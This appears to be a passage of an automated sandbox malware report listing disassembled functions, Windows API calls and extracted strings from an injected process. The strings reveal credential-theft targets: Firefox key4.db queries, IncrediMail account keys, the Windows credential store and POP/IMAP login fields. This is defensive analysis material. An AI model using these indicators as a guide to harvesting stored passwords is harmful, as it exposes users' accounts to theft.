                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                                                    • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403010
                                                                                                                                                                                                                      • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040305D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403075
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004030A6
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004030EE
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403117
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                                                    • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$strlen
                                                                                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$strlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                                                                                    • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040859A
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00408612
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                                                                                      • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                    • API String ID: 1371990430-260894208
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                    • API String ID: 2859077140-2022683286
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                    • API String ID: 2881943006-572158859
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                                                                                      • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                    • API String ID: 888011440-2039793938
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042DF97
                                                                                                                                                                                                                    • out of memory, xrefs: 0042E235
                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042E21C
                                                                                                                                                                                                                    • database is already attached, xrefs: 0042E0DD
                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042DFAC
                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042E12C
                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042E014
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                    • Opcode ID: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                                    • Instruction ID: c7e7a29d1825d2e945301ab40bb758a3ed070f64a4837571caa387bbb47581b8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFA1BC70608311DFD720DF2AE441A6BBBE4BF88318F54492FF48987252D778E945CB9A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                                                                      • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                      • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                    • String ID: $$d
                                                                                                                                                                                                                    • API String ID: 2915808112-2066904009
                                                                                                                                                                                                                    • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                    • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                    • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                    • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                    • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                    • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                                                      • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                                                      • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2432066023-0
                                                                                                                                                                                                                    • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                    • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F396
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                      • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                      • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 00403711
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040376A
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409239
                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                                                      • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                                                                                      • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                                                      • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                                                      • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                    • String ID: C@$key3.db$key4.db
                                                                                                                                                                                                                    • API String ID: 581844971-2841947474
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
